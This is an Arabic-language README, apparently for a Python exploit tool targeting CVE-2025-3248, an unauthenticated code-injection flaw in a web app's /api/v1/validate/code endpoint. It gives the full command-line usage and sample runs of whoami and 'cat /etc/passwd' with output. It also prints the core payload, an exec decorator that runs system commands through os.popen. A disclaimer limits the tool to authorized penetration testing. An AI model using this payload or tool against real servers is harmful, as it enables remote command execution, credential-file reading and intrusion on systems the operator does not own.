
استغلال لـ CVE-2025-3248: يحقن حمولات Python مصممة في نقطة نهاية API للكود غير المصادق عليها لتنفيذ أوامر عشوائية على الخادم الهدف.
هذه الأداة مُصمَّمة لاستغلال الثغرة CVE-2025-3248 (ثغرة حقن كود Python)، من خلال إنشاء حمولة ضارة (payload) لتحقيق تنفيذ أوامر عن بُعد (RCE) على الخادم الهدف. توجد الثغرة في واجهة برمجة تطبيقات (API) لتطبيق ويب معين، حيث يمكن للمهاجم استغلال نقطة تنفيذ كود غير موثقة لحقن أي كود Python.
تنبيه مهم:
هذه الأداة مخصصة فقط لاختبارات الاختراق المصرح بها. أي اختبار اختراق غير مصرح به قد ينتهك القوانين. تأكد من حصولك على تفويض صريح لاختبار النظام الهدف.
✅ حقن كود Python ضار عبر واجهة /api/v1/validate/code
✅ دعم تنفيذ أي أوامر نظام (مثل whoami، ls، إلخ)
✅ مهلة زمنية قابلة للتخصيص (افتراضي 10 ثوانٍ)
✅ دعم تنسيقَي إخراج: نصي (text) / JSON
✅ معالجة أخطاء مفصّلة ومخرجات سجل
تحرير
python cve-2025-3248.py -t <الهدف_URL> -c "<الأمر>" [خيارات]
| المعامل | إلزامي | الوصف |
|---|---|---|
-t, --target | نعم | URL الهدف (صيغة: http://ip:port) |
-c, --command | نعم | الأمر النظامي المراد تنفيذه (يُحاط بعلامات اقتباس) |
-o, --output | لا | تنسيق الإخراج (text/json، الافتراضي: text) |
--timeout | لا | مهلة الطلب (بالثواني، الافتراضي: 10) |
-v, --verbose | لا | عرض سجل التنفيذ المفصّل |
whoami (بالتنسيق الافتراضي)تحرير
python cve-2025-3248.py -t http://192.168.1.100:7860 -c "whoami"
مثال للإخراج:
تحرير
[+] تم تنفيذ الأمر بنجاح
--------------------------------------------------
www-data
--------------------------------------------------
تحرير
python cve-2025-3248.py -t https://app.example.com -c "cat /etc/passwd" -o json -v
مثال للإخراج:
تحرير
{
"status": 200,
"content": "root:x:0:0:root:/root:/bin/bash\n...",
"success": true
}
code عبر واجهة /api/v1/validate/codeexec() لتنفيذ كود Python المُرسل مباشرةتحرير
import os
@exec("raise Exception(os.popen('whoami').read())")
def f():
pass
os.popen() لتنفيذ أوامر النظام⚠️ هذه الأداة مخصصة فقط لاختبارات الاختراق المصرح بها ⚠️
-v لرؤية السجلات المفصّلة وتجنب الأخطاءrequests (يجب تثبيتها مسبقًا)تحرير
pip install requests
| رمز الخطأ | السبب | الحل |
|---|---|---|
[-] تنسيق URL الهدف خاطئ | URL يفتقد إلى scheme أو host | تحقق من تنسيق URL (مثل http://127.0.0.1:8080) |
[-] انتهاء مهلة الطلب | الهدف لم يستجب خلال المهلة | زد قيمة المعامل --timeout |
[-] خطأ في الاتصال | الهدف غير قابل للوصول/حظر بواسطة جدار الحماية | تحقق من الاتصال بالشبكة |
[-] فشل تنفيذ الأمر (رمز HTTP: 403) | رفض الإذن من جانب الخادم | تأكد من أن الخدمة الهدف تسمح بتنفيذ الكود |
/api/v1/validate/codeexec/eval)هذا المستند مخصص فقط لأغراض البحث والتعليم الأمني. لا يتحمل المؤلف أي مسؤولية عن أي ضرر مباشر أو غير مباشر ناتج عن استخدام هذه الأداة. يرجى الالتزام بالقوانين واللوائح واستخدام أدوات الأمن بشكل قانوني.